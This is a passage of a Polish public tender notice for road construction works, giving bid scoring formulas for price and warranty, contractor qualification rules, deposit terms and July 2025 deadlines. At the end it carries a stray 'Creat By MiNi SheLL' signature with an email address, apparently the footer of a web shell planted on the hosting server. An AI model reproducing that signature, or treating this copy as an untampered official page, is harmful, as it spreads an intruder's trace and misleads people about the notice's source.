które<br/>nie podlegają odrzuceniu.<br/>3. Zamawiający wyznaczył następujące kryteria i ich znaczenie:<br/>1) cena - 60 % (znaczenie)<br/>2) okres gwarancji - 40 % (znaczenie)<br/>4. Sposób oceny ofert:<br/>Kryterium 1 „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia wpisanej przez<br/>Wykonawcę w formularzu ofertowym. W kryterium „cena” można uzyskać maksymalnie 60 punktów.<br/>Liczba punktów w kryterium „cena” zostanie obliczone według wzoru:<br/>Cmin<br/>Pc = ------------ × 60 pkt<br/>Cb<br/>Pc - liczba punktów otrzymanych w kryterium „cena”,<br/>Cmin - najniższa cena brutto spośród badanych ofert niepodlegających odrzuceniu,<br/>Cb - cena brutto badanej oferty.<br/>Kryterium nr 2 „okres gwarancji” będzie oceniane na podstawie zadeklarowanej<br/>w formularzu oferty okresie gwarancji (w miesiącach) - z zastrzeżeniem, że maksymalny okres gwarancji podlegający punktacji to 60<br/>miesięcy. Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w miesiącach), ponad minimum zastrzeżone w art.<br/>577 § 4 ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (t. j. Dz. U. z 2020 r. poz. 1740 z późn. zm.) tj. 2 lata. Oznacza to, że<br/>Wykonawca otrzyma punkty za w/w kryterium oceny ofert jeśli zaproponuje okres gwarancji dłuższy niż 24 miesiące. W przypadku<br/>zaoferowania minimalnego, wymaganego okresu gwarancji (24 miesiące) Wykonawca otrzyma 0 pkt w kryterium oceny ofert okres<br/>gwarancji. Maksymalny okres gwarancji podlegający punktacji to 60 miesięcy. Oznacza to, że Wykonawca, który zaproponuje ponad<br/>60 miesięcy gwarancji otrzyma maksymalną liczbę punktów w tym kryterium oceny ofert, tak samo jak Wykonawca, który<br/>zaproponuje 60 miesięcy gwarancji, natomiast w umowę zostanie wpisany zadeklarowany przez Wykonawcę okres gwarancji. Jeżeli<br/>Wykonawca nie zadeklaruje<br/>w formularzu oferty okresu gwarancji w miesiącach, wówczas zamawiający przyjmie minimalny okres gwarancji wynoszący 24<br/>miesiące, a Wykonawca otrzyma 0 pkt w kryterium „okres gwarancji”. W przypadku zadeklarowania w formularzu oferty okresu<br/>gwarancji mniejszego niż 24 miesiące, zamawiający odrzuci ofertę ponieważ jej treść nie będzie odpowiadała treści specyfikacji<br/>warunków zamówienia.<br/>Okres rękojmi zgodnie z art. 568 § 1 Kodeksu cywilnego będzie wynosił 5 lat licząc od daty odbioru końcowego robót, bez względu<br/>na okres udzielonej gwarancji. Wykonane obiekty stanowić będą części składowe nieruchomości gruntowej i jako takie będą<br/>podlegać reżimowi rękojmi za wady fizyczne nieruchomości.<br/>Liczba punktów w kryterium „okres gwarancji” zostanie obliczone według wzoru:<br/>Gb - Gmin<br/>Pg = -------------------- × 40 pkt<br/>Gmax - Gmin<br/>Pg - liczba punktów otrzymanych w kryterium „gwarancja”,<br/>Gb – liczba miesięcy gwarancji badanej oferty, z zastrzeżeniem opisanym powyżej,<br/>Gmin - minimalny okres gwarancji podlegający punktacji (24 miesiące).<br/>Gmax - maksymalny okres gwarancji podlegający punktacji (60 miesięcy).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowe<br/>Określenie warunków:<br/>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że wykonał należycie,<br/>w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończył w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa<br/>zadania polegające na budowie, przebudowie bądź rozbudowie drogi o wartości wykonanych robót nie mniejszej niż<br/>2 000 000,00 zł brutto każde.<br/>Jako wykonanie (zakończenie zadania) należy rozumieć wystawienie co najmniej świadectwa przyjęcia (dla kontraktów<br/>realizowanych zgodnie z warunkami FIDIC) lub podpisania protokołu odbioru robót lub równoważnego dokumentu (w<br/>przypadku zamówień, w których nie wystawia się świadectwa przyjęcia). Wartości podane w dokumentach potwierdzających<br/>spełnienie warunku w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na<br/>dzień wystawienia świadectwa przyjęcia (dla kontraktów realizowanych zgodnie z warunkami FIDIC) lub podpisania<br/>protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się świadectwa<br/>przyjęcia).<br/>Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia – nie spełnia, w oparciu o informacje zawarte w<br/>wykazie robót oraz załączone dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności<br/>informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – inne dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz<br/>robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonywane, a jeżeli z uzasadnionej przyczyny niezależnej od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty (wzór stanowi załącznik Nr 4 do SWZ),</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy – załącznik nr 1 do SWZ;<br/>2) Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału<br/>w postępowaniu – załącznik nr 2 do SWZ;<br/>3) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 5 do SWZ - jeśli dotyczy;<br/>4) Oświadczenie podmiotu udostępniającego zasoby – załącznik nr 6 do SWZ – jeśli dotyczy;<br/>5) Dowód wniesienia wadium,<br/>6) odpowiednie pełnomocnictwa (jeżeli wykonawcę reprezentuje pełnomocnik) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert w<br/>wysokości 25 000,00 zł.,<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz. U. z 2019 r. poz. 310, 836 i 1572)<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym<br/>w Strzegowie nr konta 03 8238 0009 0000 0648 2000 0002. W tytule wpłaty należy dokładnie określić jakiego postępowania<br/>przelew dotyczy.<br/>4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym<br/>Zamawiającego, o którym mowa w ust. 3 niniejszej SWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i<br/>godziny wyznaczonej jako ostateczny termin składania ofert).<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt 2–4, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium wnoszone w formie gwarancji lub<br/>poręczenia, o których mowa w ust. 2 pkt 2–4 należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego<br/>podpisanego kwalifikowanym podpisem elektronicznym przez wystawce dokumentu.<br/>6. W przypadku wniesienia wadium w formie innej niż pieniądz – z dokumentu tego musi wynikać, że gwarancja/poręczenie<br/>jest nieodwołalne i bezwarunkowe. Gwarancja/poręczenie nie może w swojej treści uzależniać wypłaty wadium od<br/>potwierdzenia przez bank, jakąkolwiek inną osobę trzecią lub instytucję podpisów osób złożonych pod żądaniem wypłaty<br/>wadium w imieniu zamawiającego. Wypłata kwoty wadium nie może być też uwarunkowana żadnymi innymi formalnościami<br/>koniecznymi do spełnienia ani dokumentami koniecznymi do złożenia wraz z żądaniem wypłaty wadium. Gwarancja lub<br/>poręczenie winny przewidywać okres bezwarunkowej wypłaty maksymalnie do 30 dni kalendarzowych od pierwszego<br/>pisemnego żądania wypłaty wadium.<br/>7. Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.<br/>8. Okoliczności i zasady zwrotu wadium, oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania<br/>umowy określa ustawa PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika zgodnie z zasadami art. 58 ust. 2 ustawy Pzp<br/>(pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia należy załączyć do oferty). 2. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współprace tych wykonawców. Termin na jaki zostanie zawarta umowa, nie może być krótszy niż termin<br/>realizacji zamówienia.<br/>3. Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej, w zakresie doświadczenia zawodowego,<br/>musi być spełniony: 1) przez Wykonawcę samodzielnie, 2) przez co najmniej jeden podmiot udostępniający wiedzę i<br/>doświadczenie samodzielnie, 3) w przypadku Wykonawców występujących wspólnie - samodzielnie przez co najmniej<br/>jednego z Wykonawców występujących wspólnie. 4. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie<br/>zamówienia składają oświadczenie, z którego wynika, które usługi wykonują poszczególni Wykonawcy – załącznik nr 5 do<br/>SWZ. 5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w<br/>rozdziale XXII ust. 1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to musi<br/>potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający poza możliwością zmiany Umowy w przypadkach określonych w art. 455 ustawy z dnia 11 września 2019 r.<br/>- Prawo zamówień publicznych, przewiduje możliwość zmiany Umowy, gdy zmiany spowodowane są wystąpieniem<br/>okoliczności takich jak:<br/>1) pojawienie się na rynku materiałów lub urządzeń nowszej generacji niż wskazane w SWZ, pozwalających na<br/>zaoszczędzenie kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego przedmiotu Umowy, lub<br/>umożliwiających uzyskanie lepszej jakości przedmiotu Umowy;<br/>2) pojawienie się nowszej technologii wykonania zaprojektowanych robót budowlanych stanowiących przedmiot Umowy,<br/>powodującej zmianę sposobu wykonywania Umowy, pozwalającej na skrócenie czasu realizacji przedmiotu Umowy i<br/>zmniejszenie kosztów wykonywanych prac lub robót, jak również kosztów eksploatacji wykonanego przedmiotu Umowy, pod<br/>warunkiem osiągnięcia nie mniejszych parametrów końcowych wykonanych robót, na umotywowany wniosek Wykonawcy<br/>po akceptacji Zamawiającego;<br/>3) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych skutkujących<br/>niemożliwością zrealizowania przedmiotu Umowy przy dotychczasowych założeniach technologicznych lub czasowych;<br/>4) wystąpienie wad lub błędów dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień,<br/>jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu<br/>realizacji robót lub koszty ich wykonania;<br/>5) uzasadnione zmiany w zakresie sposobu wykonania Przedmiotu Umowy proponowane przez Zamawiającego lub<br/>Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;<br/>6) wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących<br/>niemożnością dotrzymania terminu realizacji Przedmiotu Umowy;<br/>7) wystąpienie dodatkowych, a niemożliwych do przewidzenia przed zawarciem Umowy robót;<br/>8) niemożliwe do przewidzenia niekorzystne warunki atmosferyczne, archeologiczne, hydrologiczne, geologiczne, kolizje z<br/>sieciami infrastruktury, utrudniające lub uniemożliwiające terminowe wykonanie Przedmiotu Umowy - fakt ten musi mieć<br/>odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez Nadzór Inwestorski.<br/>2. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 możliwa jest zmiana sposobu wykonania,<br/>terminu wykonania umowy, ceny, zmiana materiałów<br/>i technologii wykonania przedmiotu Umowy i konstrukcji obiektów budowlanych, jak również zmiany lokalizacji obiektów<br/>budowlanych i urządzeń w zakresie adekwatnym do przyczyny powodującej konieczność zmiany.<br/>3. W przypadku dokonania określonych czynności lub ich zaniechania przez organy administracji państwowej, w tym organy<br/>administracji rządowej, samorządowej, jak również organy i podmioty, których działalność wymaga wydania jakiejkolwiek<br/>decyzji o charakterze administracyjnym w trakcie wykonywania przedmiotu niniejszej Umowy, w szczególności:<br/>1) opóźnienia wydania przez w/w organy decyzji, zezwoleń, uzgodnień itp., do wydania których są zobowiązane lub<br/>Wykonawca ma obowiązek je pozyskać na mocy przepisów prawa,<br/>2) odmowy wydania przez w/w organy decyzji, zezwoleń, uzgodnień itp., z przyczyn niezawinionych przez Wykonawcę,<br/>możliwa jest zmiana terminów pośrednich, a także terminu ostatecznego o okres wynikający z opisanych w ust. 3<br/>okoliczności.<br/>4. Pozostałe zmiany Umowy mogą być spowodowane następującymi okolicznościami:<br/>1) siła wyższa, o której mowa w § 12, uniemożliwiająca wykonanie przedmiotu Umowy zgodnie z SWZ;<br/>2) nieprzewidziane w SWZ warunki archeologiczne, techniczne, terenowe i wodne;<br/>Ze względu na ograniczą maksymalną długość pola pozostałe zmiany znajdują się w specyfikacji warunków zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-de622c09-9ae6-456f-96ff-65b8b79c8241</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający ogranicza liczbę wykonawców, których ewentualnie zaprosi do negocjacji do 5 wykonawców spełniających<br/>w najwyższym stopniu kryteria oceny ofert określone w Rozdziale XVI SWZ. W przypadku gdy liczba wykonawców, którzy<br/>złożyli oferty niepodlegające odrzuceniu jest mniejsza niż 5, Zamawiający zaprosi wszystkich wykonawców do negocjacji<br/>Kryteria i ich znaczenie:<br/>1) cena - 60 % (znaczenie)<br/>2) okres gwarancji- 40 % (znaczenie)

Creat By MiNi SheLL
Email: jattceo@gmail.com